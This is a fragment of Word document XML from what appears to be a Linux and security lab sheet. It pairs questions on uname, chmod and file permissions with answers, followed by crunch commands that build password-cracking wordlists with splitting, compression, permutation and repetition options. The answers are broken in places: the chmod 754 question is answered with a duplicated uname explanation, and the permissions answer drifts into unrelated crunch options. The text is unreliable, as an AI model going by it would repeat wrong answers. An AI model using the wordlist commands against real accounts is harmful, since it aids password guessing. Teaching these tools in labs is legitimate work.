                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> [option]". For example, to display the kernel name, the command would be "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B576DA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -s".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A17E11D" w14:textId="77777777" w:rsidR="00B576DA" w:rsidRPr="00B576DA" w:rsidRDefault="00B576DA" w:rsidP="00B576DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="096B8206" w14:textId="12705274" w:rsidR="001138A0" w:rsidRPr="0092721C" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Explain the following syntax:  "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 754 filename".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BC6F05" w14:textId="6EB96DD3" w:rsidR="0092721C" w:rsidRDefault="0092721C" w:rsidP="0092721C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The command used to find out all the information about the OS in LINUX is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>". It is used to display system information such as the kernel name, operating system, machine hardware name, and more. The command syntax is "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> [option]". For example, to display the kernel name, the command would be "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0092721C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -s".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CA4F70" w14:textId="77777777" w:rsidR="0092721C" w:rsidRPr="0092721C" w:rsidRDefault="0092721C" w:rsidP="0092721C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C67C50B" w14:textId="324894A8" w:rsidR="001138A0" w:rsidRPr="007713F3" w:rsidRDefault="001138A0"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Elaborate on the different </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>privileges and permissions in LINUX.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43CD21CF" w14:textId="3529DD5C" w:rsidR="007713F3" w:rsidRPr="00942476" w:rsidRDefault="00942476" w:rsidP="00942476">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00942476">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>In LINUX, there are three types of permissions: read, write, and execute. These permissions are assigned to three different groups: owner, group, and others.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58978A96" w14:textId="77777777" w:rsidR="00942476" w:rsidRDefault="00942476" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1531AC14" w14:textId="71796152" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Use </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>–b option</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t> for wordlist fragmentation that split a single wordlist into multi wordlist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA34958" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E"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crunch 5 7 raj@123 -b 3mb -o START</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4172C8" w14:textId="77777777" w:rsidR="0009724E" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Crunch let you generate compress wordlist with </w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>option –z</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> and other parameters are </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">, bzip2, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>lzma</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>, and 7z</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D627439" w14:textId="4511A146" w:rsidR="0069215B" w:rsidRDefault="0069215B" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0198C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5064C9EE" wp14:editId="45A37E96">
                  <wp:extent cx="4534713" cy="1805939"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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7.jpeg"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId131" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4534713" cy="1805939"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2FCAEE" w14:textId="77777777" w:rsidR="00942476" w:rsidRPr="001C411D" w:rsidRDefault="00942476" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25DD5D3E" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E"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crunch 5 7 raj@123 –z </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o START</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384ECD4B" w14:textId="77777777" w:rsidR="0009724E" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> option is used for generating wordlist with help of permutation, here can ignore min and max length of the character string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9B3081" w14:textId="06DF5BBB" w:rsidR="0069215B" w:rsidRDefault="001A440E" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0198C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41CEBD05" wp14:editId="3336497A">
                  <wp:extent cx="4572005" cy="1554480"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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jpeg"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId132" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4572005" cy="1554480"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8E67FA" w14:textId="77777777" w:rsidR="00942476" w:rsidRPr="001C411D" w:rsidRDefault="00942476" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="422691CF" w14:textId="77777777" w:rsidR="0009724E" w:rsidRDefault="0009724E"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crunch 3 6 -p raj </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>chandel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>hackingarticles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6DCA82C8" w14:textId="11B1C82D" w:rsidR="004A65D6" w:rsidRDefault="004A65D6" w:rsidP="004A65D6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0198C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C5926C9" wp14:editId="3331CEF4">
                  <wp:extent cx="4859414" cy="1106424"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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jpeg"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId133" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4859414" cy="1106424"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="568DE15F" w14:textId="77777777" w:rsidR="00942476" w:rsidRPr="001C411D" w:rsidRDefault="00942476" w:rsidP="004A65D6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CB48AB0" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>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crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15396FA3" w14:textId="77777777" w:rsidR="0009724E" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>use –d</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t> option to set the filter for repetition.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="577C70B1" w14:textId="309B2CEA" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="00315F4F" w:rsidP="00315F4F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F0198C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D56FE6" wp14:editId="4E329987">
                  <wp:extent cx="4624192" cy="1834896"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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0.jpeg"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId134" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4624192" cy="1834896"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="257BB093" w14:textId="77777777" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33FF1EEC" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62030FCA" w14:textId="40B11E81" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="0009724E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EC04BE" w14:textId="2A7ECA9C" w:rsidR="0009724E" w:rsidRPr="001C411D" w:rsidRDefault="0009724E" w:rsidP="0009724E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
